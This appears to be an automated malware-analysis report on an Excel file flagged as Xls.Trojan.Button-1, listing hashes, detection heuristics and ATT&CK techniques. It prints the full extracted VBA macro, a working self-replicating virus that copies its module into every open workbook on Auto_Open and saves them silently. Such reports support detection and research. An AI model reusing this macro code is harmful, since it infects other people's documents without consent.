Xls.Trojan.Button-1 Office (OLE) malware analysis — malicious · 022eb2e88be99e12

MALICIOUS

Office (OLE)

44.5 KB Created: 1999-02-08 09:24:15 Authoring application: Microsoft Excel First seen: 2012-06-14

MD5: f2a02b3ba61182adaa2e086864b4aeeb SHA-1: b6e618e198165e3ffed668b50e48b5389d28475f SHA-256: 022eb2e88be99e12f830668921f0a09871bd408545d7e680ccfd77f7296e6fd4

300 Risk Score

Malware Insights

Xls.Trojan.Button-1 · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is an Excel file with a high-confidence detection for VBA macros, specifically an Auto_Open macro, which is a common technique for executing malicious code upon opening. ClamAV identifies this as 'Xls.Trojan.Button-1'. The presence of an Auto_Open macro indicates an attempt to immediately run a payload, likely for further system compromise.

Heuristics 6

ClamAV: Xls.Trojan.Button-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Trojan.Button-1
Embedded Office document has suspicious static findings critical EMBEDDED_OFFICE_CHILD_STATIC_TRIAGE

A CFB/OLE Office document was found inside another file type and its carved contents matched Office exploit or payload heuristics. This catches wrapped exploit documents where the top-level file routes to a PE, archive, or generic scanner instead of Office.
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY

OLE file is 20,824 bytes but its declared streams total only 0 bytes — 20,824 bytes (100%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Auto_Open macro high OLE_VBA_AUTO

Auto_Open macro
CFB header with no readable streams medium OLE_PARSE_EMPTY_STREAMS

The file begins with a valid OLE2/CFB header but exposes no directory streams. A non-empty compound document with an unreadable directory is anomalous — it is seen with truncated/corrupt files and, more importantly, with content deliberately shifted off byte boundaries to defeat parsers while the host application still recovers the object.

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	3634 bytes
SHA-256: `4932f26955a9df5616c808e7c50ea325248f17371d1d8366756a61245d69be60`
Detection ClamAV: Xls.Trojan.Button-1 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet2" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet3" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet4" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet5" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet6" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "cmdButton" Option Explicit Private Sub RunChild() Dim cbar As CommandBar Dim cbarTool As CommandBarControl On Error Resume Next Set cbar = Application.CommandBars("Worksheet Menu Bar") If cbar.Controls(1).Tag <> "Happy" Then Set cbarTool = cbar.Controls.Add(msoControlButton, , , 1) With cbarTool .FaceId = 59 .Tag = "Happy" .OnAction = "" .TooltipText = "Don't press this button" .Style = msoButtonIcon End With End If End Sub Private Sub Auto_Open() Reproduce RunChild End Sub Private Sub Reproduce() Dim wb As Workbook Dim wbAct As Workbook Dim i As Integer, boolAdd As Boolean On Error Resume Next Set wbAct = activeworkbook wbAct.VBProject.VBComponents.Item("cmdbutton").Export "C:\cmdbutton.bas" Application.DisplayAlerts = False For Each wb In Workbooks boolAdd = True If wb.Name <> wbAct.Name Then wb.VBProject.References.AddFromFile ("C:\Program Files\Common Files\Microsoft Shared\VBA\VBEext1.olb") For i = 1 To wb.VBProject.VBComponents.count If wb.VBProject.VBComponents(i).Name = "cmdButton" Then boolAdd = False Exit For End If Next i If boolAdd = True Then wb.VBProject.VBComponents.Import "C:\cmdbutton.bas" End If End If Application.ScreenUpdating = False wb.SAVE Application.ScreenUpdating = True Next wb Application.DisplayAlerts = True End Sub
`embedded_office_off000060a8.ole`	embedded-office	Embedded OLE/CFB Office body inside ole container at offset 0x60A8	20824 bytes
SHA-256: `14d4b7609160a0f89b6af5d99c0b904d81820bfe82e247b5fd74adee885bacf2`

Open this report in the interactive analyzer, or submit your own file for analysis.